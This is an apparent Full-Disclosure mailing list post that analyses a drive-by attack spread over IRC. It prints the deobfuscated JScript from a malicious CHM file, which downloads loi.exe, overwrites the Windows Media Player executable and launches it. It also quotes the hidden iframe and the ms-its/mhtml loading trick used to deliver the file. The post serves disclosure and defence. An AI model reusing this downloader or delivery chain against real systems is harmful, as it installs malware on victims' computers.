-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
source of the jscript inside the chm
have a nice day
<SCRIPT LANGUAGE="javascript">
~ function getPath(url) {
~ start = url.indexOf('http:')
~ end = url.indexOf('LOI.CHM')
~ return url.substring(start, end);
~ }~ tehaa = 'ADO' + 'DB' + '.St' + 'ream'; ~ tehao = 'Micro' + 'soft.XM' + 'LHTTP'; ~ tehex = '.exe'; ~ tehwmp = 'C:\\Pr' + 'ogram Files\\Win' + 'dows Media Player\\wmpl' + 'ayer' + tehex; ~ tehmms = 'm' + 'm' + 's' + ':/' + '/';
~ var tehf = new ActiveXObject(tehaa); ~ tehf.Mode = 3; ~ tehf.Type = 1;
~ tehgURLf = getPath(location.href)+'loi' + tehex;
~ var tehg = new ActiveXObject(tehao);
~ tehg.Open("GET",tehgURLf,0);
~ tehg.Send();~ tehf.Open(); ~ tehf.Write(tehg.responseBody);
~ tehf.SaveToFile(tehwmp,2); ~ location.href = tehmms;
</SCRIPT>
Francois Harvey SecuriWeb inc.
Niek Baakman a �crit :
| Hi list,
|
| this thing's been going around on irc the last few days:
|
| www.divx.dc-hub.com (IE users don't click it!) check source:
| <iframe src='loi.htm' width=0 height=0></iframe>
|
| loi.htm contains: <object
| data="ms-its:mhtml:file://C:\winhelp.mht!${PATH}/LOI.CHM::/loi.htm"
| type="text/x-scriptlet"></object>
|
|
| LOI.CHM is attached
|
| Regards,
|
| Niek Baakman
|-----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.3 (MingW32)
iD8DBQFAca0ebw9u6+cJxl4RAphzAJ9TRgSBuaPatVFbXBfzqBoKmbrHCACeJ/X8 FZvzRZU2LDEPQyJ0lVMXWiQ= =Bvkg -----END PGP SIGNATURE-----
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
